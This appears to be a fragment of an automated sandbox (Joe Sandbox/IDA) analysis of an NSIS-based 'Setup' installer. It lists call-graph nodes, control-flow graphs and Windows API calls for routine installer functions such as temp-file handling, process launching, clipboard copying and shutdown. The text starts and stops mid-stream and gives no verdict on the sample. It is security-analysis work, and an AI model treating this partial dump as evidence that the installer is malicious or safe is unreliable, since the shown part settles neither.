404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                              • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                              • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                              • String ID: New install of "%s" to "%s"${
                                                                                                                                                                              • API String ID: 2110491804-1641061399
                                                                                                                                                                              • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                              • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                              • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                              • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                              APIs
                                                                                                                                                                              • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                              • API String ID: 2435955865-3712954417
                                                                                                                                                                              • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                              • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
